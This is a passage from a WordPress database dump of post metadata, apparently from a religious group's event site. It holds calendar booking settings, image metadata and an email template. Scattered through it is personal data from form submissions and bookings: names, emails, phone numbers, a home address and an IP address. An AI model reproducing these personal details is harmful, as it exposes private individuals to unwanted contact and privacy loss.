;s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(161313,266657,'mec_hourly_schedules','a:0:{}'),(161312,266657,'mec_not_in_days',''),(161248,266655,'mec_transaction_id','NXZ69692'),(161704,266676,'_dp_original','265240'),(161705,266676,'_edit_lock','1653523023:15'),(161706,266676,'_edit_last','15'),(161707,266677,'_wp_attached_file','2022/05/LifeAfterDeath.webp'),(161708,266677,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:27:\"2022/05/LifeAfterDeath.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"LifeAfterDeath-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"LifeAfterDeath-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"LifeAfterDeath-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"LifeAfterDeath-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"LifeAfterDeath-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"LifeAfterDeath-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(161709,266676,'_thumbnail_id','266677'),(161710,266677,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/05/LifeAfterDeath.webp - cannot be optimized, it has an invalid file type'),(161711,266677,'smush-complete',''),(161847,266690,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(161848,266690,'mec_certain_weekdays','a:0:{}'),(161849,266690,'mec_allday','0'),(161850,266690,'mec_hide_time','0'),(161851,266690,'mec_hide_end_time','0'),(161852,266690,'mec_comment',''),(161853,266690,'mec_repeat_status','0'),(161854,266690,'mec_repeat_type',''),(161855,266690,'mec_repeat_interval','1'),(161856,266690,'mec_repeat_end',''),(161857,266690,'mec_repeat_end_at_occurrences',''),(161858,266690,'mec_repeat_end_at_date',''),(161859,266690,'mec_advanced_days','a:0:{}'),(161860,266690,'mec_in_days',''),(161861,266690,'mec_not_in_days',''),(161862,266690,'mec_hourly_schedules','a:0:{}'),(161863,266690,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(161864,266690,'mec_tickets','a:0:{}'),(161865,266690,'mec_fees_global_inheritance','1'),(161866,266690,'mec_fees','a:0:{}'),(161867,266690,'mec_ticket_variations_global_inheritance','1'),(161868,266690,'mec_ticket_variations','a:0:{}'),(161869,266690,'mec_reg_fields_global_inheritance','1'),(161870,266690,'mec_reg_fields','a:0:{}'),(161871,266690,'mec_op','a:0:{}'),(161872,266690,'mec_event_date_submit','20210422105713'),(161873,266690,'mec_read_more',''),(161874,266690,'mec_more_info',''),(161875,266690,'mec_more_info_title',''),(161876,266690,'mec_more_info_target','_self'),(161877,266690,'mec_cost',''),(161878,266690,'mec_currency','a:0:{}'),(161879,266690,'mec_additional_organizer_ids','a:0:{}'),(161880,266690,'mec_additional_location_ids','a:0:{}'),(161881,266690,'one_occurrence','0'),(161882,266690,'mec_timezone','global'),(161883,266690,'mec_countdown_method','global'),(161884,266690,'mec_public','1'),(161885,266690,'mec_bfixed_fields','a:0:{}'),(161886,266690,'mec_fields','a:0:{}'),(161887,266690,'mec_event_status','EventScheduled'),(161888,266690,'mec_moved_online_link',''),(161889,266690,'mec_cancelled_reason',''),(161890,266690,'mec_display_cancellation_reason_in_single_page',''),(161891,266690,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(161892,266690,'passster_activate_global_protection',NULL),(161893,266690,'passster_activate_protection',NULL),(161894,266690,'passster_protection_type','password'),(161895,266690,'_wp_old_date','2022-01-18'),(161896,266690,'boldgrid_in_page_containers','1'),(161897,266690,'_dp_original','265425'),(161898,266690,'_edit_lock','1653314190:15'),(161899,266690,'_edit_last','15'),(161900,266690,'_thumbnail_id','266373'),(161703,266676,'boldgrid_in_page_containers','1'),(161702,266676,'passster_protection_type','password'),(161701,266676,'passster_activate_protection',NULL),(161700,266676,'passster_activate_global_protection',NULL),(189948,268894,'_field_137','Testing'),(159674,266548,'_form_id','13'),(159675,266548,'_seq_num','104'),(159680,266551,'original-file','2022/04/email-img-registration-603-lg-blu-jpg-updraft-pre-smush-original.png'),(159678,266551,'_wp_attached_file','2022/04/email-img-registration-603-lg-blu-jpg.png'),(159679,266551,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:602;s:6:\"height\";i:302;s:4:\"file\";s:49:\"2022/04/email-img-registration-603-lg-blu-jpg.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"email-img-registration-603-lg-blu-jpg-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"email-img-registration-603-lg-blu-jpg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:49:\"email-img-registration-603-lg-blu-jpg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:49:\"email-img-registration-603-lg-blu-jpg-474x302.png\";s:5:\"width\";i:474;s:6:\"height\";i:302;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:49:\"email-img-registration-603-lg-blu-jpg-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:49:\"email-img-registration-603-lg-blu-jpg-300x302.png\";s:5:\"width\";i:300;s:6:\"height\";i:302;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(159681,266551,'smush-complete','1'),(159682,266551,'smush-info','The file was compressed from 259.82 KB to 81.50 KB saving 68.63 percent using WP-Optimize'),(159683,266551,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:266060;s:12:\"smushed-size\";i:83457;s:15:\"savings-percent\";d:68.6299999999999954525264911353588104248046875;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:266060;s:10:\"compressed\";i:83457;}s:6:\"medium\";a:2:{s:8:\"original\";i:68763;s:10:\"compressed\";i:24435;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:36886;s:10:\"compressed\";i:13364;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:119654;s:10:\"compressed\";i:42167;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:196958;s:10:\"compressed\";i:66129;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:136675;s:10:\"compressed\";i:48134;}s:8:\"tileview\";a:2:{s:8:\"original\";i:127137;s:10:\"compressed\";i:42847;}}}'),(159686,266552,'_field_425','Alexa'),(159687,266552,'_field_426','Massey'),(159688,266552,'_field_427','AlexaReevesMassey@gmail.com'),(159689,266552,'_form_id','46'),(159690,266552,'_seq_num','51'),(170802,267309,'mec_hide_time','0'),(194016,269256,'_field_652','Chiapputi wharf'),(194017,269256,'_field_653','love2ride0007@gmail.com'),(194018,269256,'_field_651','(719) 424-0699'),(194019,269256,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(194020,269256,'_field_649',''),(159699,266554,'_field_425','Bonnie'),(159700,266554,'_field_426','Greenstreet'),(159701,266554,'_field_427','bngstreet@gmail.com'),(159702,266554,'_form_id','46'),(159703,266554,'_seq_num','52'),(159704,266555,'_wp_attached_file','2022/04/email-img-registration-600-5.jpg'),(159705,266555,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:601;s:6:\"height\";i:302;s:4:\"file\";s:40:\"2022/04/email-img-registration-600-5.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-5-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-5-474x302.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:302;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-5-300x302.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:302;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(159706,266555,'original-file','2022/04/email-img-registration-600-5-updraft-pre-smush-original.jpg'),(159707,266555,'smush-complete','1'),(159708,266555,'smush-info','The file was compressed from 54.92 KB to 52.59 KB saving 4.26 percent using WP-Optimize'),(159709,266555,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:56243;s:12:\"smushed-size\";i:53849;s:15:\"savings-percent\";d:4.2599999999999997868371792719699442386627197265625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:56243;s:10:\"compressed\";i:53849;}s:6:\"medium\";a:2:{s:8:\"original\";i:14674;s:10:\"compressed\";i:14674;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8584;s:10:\"compressed\";i:8518;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25750;s:10:\"compressed\";i:25723;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:40068;s:10:\"compressed\";i:39818;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27017;s:10:\"compressed\";i:26833;}s:8:\"tileview\";a:2:{s:8:\"original\";i:28593;s:10:\"compressed\";i:28302;}}}'),(161815,266688,'mec_bfixed_fields','a:0:{}'),(161814,266688,'mec_reg_fields','a:0:{}'),(161813,266688,'mec_reg_fields_global_inheritance','1'),(161812,266688,'mec_ticket_variations','a:0:{}'),(161811,266688,'mec_ticket_variations_global_inheritance','1'),(161810,266688,'mec_fees','a:0:{}'),(161809,266688,'mec_fees_global_inheritance','1'),(161808,266688,'mec_tickets','a:0:{}'),(161740,266683,'mec_gateway_label','Free'),(161739,266683,'mec_gateway','MEC_gateway_free'),(161738,266683,'mec_price','0'),(161737,266683,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:24:\"elizabethstar1@yahoo.com\";s:4:\"name\";s:17:\"Elizabeth Brandes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"73.34.17.40\";}}'),(161736,266683,'mec_ticket_price_1','0'),(161824,266688,'passster_activate_global_protection',NULL),(161823,266688,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(161821,266688,'mec_display_cancellation_reason_in_single_page',''),(161822,266688,'boldgrid_hide_page_title','0'),(161820,266688,'mec_cancelled_reason',''),(161819,266688,'mec_moved_online_link',''),(161818,266688,'mec_event_status','EventScheduled'),(161846,266690,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-05\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(161845,266690,'mec_end_day_seconds','41400'),(161844,266690,'mec_end_time_ampm','AM'),(161843,266690,'mec_end_time_minutes','30'),(161842,266690,'mec_end_time_hour','11'),(161841,266690,'mec_end_date','2022-06-05'),(161840,266690,'mec_start_day_seconds','37800'),(161839,266690,'mec_start_time_ampm','AM'),(161838,266690,'mec_start_time_minutes','30'),(161837,266690,'mec_start_time_hour','10'),(161836,266690,'mec_start_date','2022-06-05'),(161835,266690,'mec_organizer_id','1'),(161834,266690,'mec_dont_show_map','0'),(161831,266690,'protect_children',''),(161832,266690,'mec_color',''),(161833,266690,'mec_location_id','122'),(161830,266688,'_edit_last','2'),(161827,266688,'boldgrid_in_page_containers','1'),(161828,266688,'_dp_original','265919'),(161829,266688,'_edit_lock','1679944995:2'),(161826,266688,'passster_protection_type','password'),(161825,266688,'passster_activate_protection',NULL),(161817,266688,'mec_fields','a:0:{}'),(161816,266688,'mec_op','a:0:{}'),(161735,266683,'mec_booking_location','118'),(161734,266683,'mec_book_date_submit','20220514101757'),(161741,266686,'mec_transaction_id','CER60581'),(161930,266692,'_field_503','US'),(161931,266692,'_field_505','I\'ve been attending the temple for a month now. I have been reading the material and I am ready to join and take the discourses. They said it would be easy to sign up on the website. However, I think I\'m overlooking the place to click. I didn\'t see a page to sign-up or register. Feel free to call or email.'),(161932,266692,'_form_id','53'),(161933,266692,'_seq_num','4'),(161929,266692,'_field_502','CO'),(161928,266692,'_field_501','Lakewood'),(161927,266692,'_field_500','741 S Gray St. Unit 4'),(161926,266692,'_field_499','yusuf33613@gmail.com'),(161925,266692,'_field_498','(720) 327-4663'),(159961,266567,'_wp_attached_file','2022/04/HUSOS.webp'),(159962,266567,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:18:\"2022/04/HUSOS.webp\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"HUSOS-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"HUSOS-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:18:\"HUSOS-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:18:\"HUSOS-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:18:\"HUSOS-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:18:\"HUSOS-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(159964,266568,'mec_color',''),(159965,266568,'mec_location_id','129'),(159966,266568,'mec_dont_show_map','0'),(159967,266568,'mec_organizer_id','1'),(159968,266568,'mec_read_more',''),(159969,266568,'mec_more_info',''),(159970,266568,'mec_more_info_title',''),(159971,266568,'mec_more_info_target','_self'),(159972,266568,'mec_cost',''),(159973,266568,'mec_currency','a:0:{}'),(159974,266568,'mec_additional_organizer_ids','a:0:{}'),(159975,266568,'mec_additional_location_ids','a:0:{}'),(159976,266568,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-08\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-08\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(159977,266568,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(159978,266568,'mec_certain_weekdays','a:0:{}'),(159979,266568,'mec_allday','0'),(159980,266568,'one_occurrence','0'),(159981,266568,'mec_hide_time','0'),(159982,266568,'mec_hide_end_time','0'),(159983,266568,'mec_comment',''),(159984,266568,'mec_timezone','global'),(159985,266568,'mec_countdown_method','global'),(159986,266568,'mec_public','1'),(159987,266568,'mec_start_date','2022-05-08'),(159988,266568,'mec_start_time_hour','10'),(159989,266568,'mec_start_time_minutes','30'),(159990,266568,'mec_start_time_ampm','AM'),(159991,266568,'mec_start_day_seconds','37800'),(159992,266568,'mec_end_date','2022-05-08'),(159993,266568,'mec_end_time_hour','11'),(159994,266568,'mec_end_time_minutes','30'),(159995,266568,'mec_end_time_ampm','PM'),(159996,266568,'mec_end_day_seconds','84600'),(159997,266568,'mec_repeat_status','0'),(159998,266568,'mec_repeat_type',''),(159999,266568,'mec_repeat_interval','1'),(160000,266568,'mec_repeat_end',''),(160001,266568,'mec_repeat_end_at_occurrences',''),(160002,266568,'mec_repeat_end_at_date',''),(160003,266568,'mec_advanced_days','a:0:{}'),(160004,266568,'mec_in_days',''),(160005,266568,'mec_not_in_days',''),(160006,266568,'mec_hourly_schedules','a:0:{}'),(160007,266568,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(160008,266568,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(160009,266568,'mec_fees_global_inheritance','1'),(160010,266568,'mec_fees','a:0:{}'),(160011,266568,'mec_ticket_variations_global_inheritance','1'),(160012,266568,'mec_ticket_variations','a:0:{}'),(160013,266568,'mec_reg_fields_global_inheritance','1'),(160014,266568,'mec_reg_fields','a:0:{}'),(160015,266568,'mec_bfixed_fields','a:0:{}'),(160016,266568,'mec_op','a:0:{}'),(160017,266568,'mec_fields','a:0:{}'),(160018,266568,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6154:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for 